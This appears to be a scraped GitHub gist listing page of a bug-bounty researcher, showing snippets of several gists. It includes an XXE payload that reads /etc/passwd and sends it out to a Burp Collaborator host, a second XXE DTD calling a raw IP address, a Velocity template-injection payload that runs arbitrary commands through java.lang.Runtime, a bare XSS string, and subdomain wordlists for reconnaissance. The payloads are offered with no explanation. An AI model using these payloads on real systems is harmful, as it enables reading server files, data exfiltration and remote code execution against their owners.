Ben Sadeghipour nahamsec
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % xxePOC SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % exfildata "<!ENTITY % exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>"> | |
| %exfildata; | |
| %exfil; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % d SYSTEM "https://138.68.23.180:443"> | |
| <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>"> |
nahamsec
/ 1stleveldomainsbycount
Created
June 25, 2020 19:44
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www,719407 | |
| api,69552 | |
| eks,67581 | |
| svc,67131 | |
| cloudapp,65945 | |
| vpn,55659 | |
| bastion,53840 | |
| ax,40676 | |
| dev,38756 | |
| operations,35663 |
nahamsec
/ extracted-subdomains
Created
June 25, 2020 18:51
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| prestigegiftware | |
| 12boxing | |
| 7clouds | |
| alfredhealth | |
| mywell | |
| phdrastreador | |
| halorei | |
| qa2static | |
| hemoservice | |
| astellaspharma |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #set ($e="exp") | |
| #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) | |
| #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) | |
| #set($sc = $e.getClass().forName("java.util.Scanner")) | |
| #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) | |
| #set($scan=$constructor.newInstance($input).useDelimiter("\\A")) | |
| #if($scan.hasNext()) | |
| $scan.next() | |
| #end |
nahamsec
/ gist:143f4dcdc9ca4ef835c17b164939eef0
Created
January 10, 2018 21:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert();// |